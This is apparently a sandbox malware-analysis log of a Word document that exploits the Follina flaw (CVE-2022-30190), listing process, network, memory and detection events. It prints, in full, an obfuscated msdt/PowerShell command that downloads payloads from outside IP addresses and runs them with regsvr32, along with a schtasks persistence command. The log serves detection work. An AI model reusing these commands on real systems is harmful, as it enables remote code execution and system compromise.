                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://tasks.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://web.microsoftstream.com/video/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://webshell.suite.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://wus2.contentsync.
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://wus2.pagecontentsync.
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://www.odwebp.svc.ms
                            Source: global trafficHTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 185.234.247.119Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 185.234.247.119If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMTIf-None-Match: "6299dd5d-1861"Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /972639944.dat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 185.234.247.119Connection: Keep-Alive
                            Source: 00000007.00000002.710859302.00000000032B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
                            Source: 00000007.00000002.711008375.0000000003308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
                            Source: 00000007.00000002.710962250.0000000003300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
                            Source: 00000007.00000002.712552314.0000000003600000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
                            Source: Process Memory Space: msdt.exe PID: 2984, type: MEMORYSTRMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\89DF4BAA.htm, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\16E37148.htm, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_049A2988
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_049A358D
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_049A8240
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_049A670F
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_049A6350
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042B2988
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042B358D
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042B8240
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042B670F
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042B6350
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_008258CA
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_008258D4
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_00822B11
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_008277C4
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_00821F0C
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04B02988
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04B0358D
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04B08240
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04B0670F
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04B06350
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04AB77C4
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04AB1F0C
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04AB58CA
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04AB58D4
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04AB2B11
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 32_2_02F98240
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 32_2_02F96350
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 32_2_02F9670F
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 32_2_02F92988
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 32_2_02F9358D
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499D447 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499D959 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042AD447 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042AD959 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04AFD447 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04AFD959 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,
                            Source: DiagPackage.dll.mui.7.drStatic PE information: No import functions for PE file found
                            Source: DiagPackage.dll.7.drStatic PE information: No import functions for PE file found
                            Source: DiagPackage.dll.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: DiagPackage.dll.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: DiagPackage.dll.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXESection loaded: sfc.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: jr3.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: jr3.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: jr3.dll
                            Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: jr3.dll
                            Source: doc782.docxVirustotal: Detection: 28%
                            Source: doc782.docxReversingLabs: Detection: 17%
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                            Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\asaommz3\asaommz3.cmdline
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2969.tmp" "c:\Users\user\AppData\Local\Temp\asaommz3\CSCAF22E0F83F3247E8BD8B234DB9985444.TMP"
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ghm531\i3ghm531.cmdline
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4732.tmp" "c:\Users\user\AppData\Local\Temp\i3ghm531\CSCC6D89D5E8D544281B069B8814BE4D14E.TMP"
                            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A
                            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A
                            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\01rkp2ka\01rkp2ka.cmdline
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B1C.tmp" "c:\Users\user\AppData\Local\Temp\01rkp2ka\CSC332C869B68444DFCA3A2C61AAABD180.TMP"
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06
                            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t1.A"
                            Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t1.A"
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2969.tmp" "c:\Users\user\AppData\Local\Temp\asaommz3\CSCAF22E0F83F3247E8BD8B234DB9985444.TMP"
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4732.tmp" "c:\Users\user\AppData\Local\Temp\i3ghm531\CSCC6D89D5E8D544281B069B8814BE4D14E.TMP"
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B1C.tmp" "c:\Users\user\AppData\Local\Temp\01rkp2ka\CSC332C869B68444DFCA3A2C61AAABD180.TMP"
                            Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06
                            Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t1.A"
                            Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32
                            Source: doc782.LNK.0.drLNK file: ..\..\..\..\..\Desktop\doc782.docx
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{F7EB1FF3-EBC0-4416-8F4D-8BB97AA1D04B} - OProcSessId.datJump to behavior
                            Source: classification engineClassification label: mal100.troj.expl.evad.winDOCX@31/32@0/2
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499E400 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499B96A CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,
                            Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{B70640EC-1F2A-4D99-888E-C770DEC0899F}
                            Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{536EBBDF-F89D-4065-AD6A-DA847C33EC3A}
                            Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{536EBBDF-F89D-4065-AD6A-DA847C33EC3A}
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1548:120:WilError_01
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.iniJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
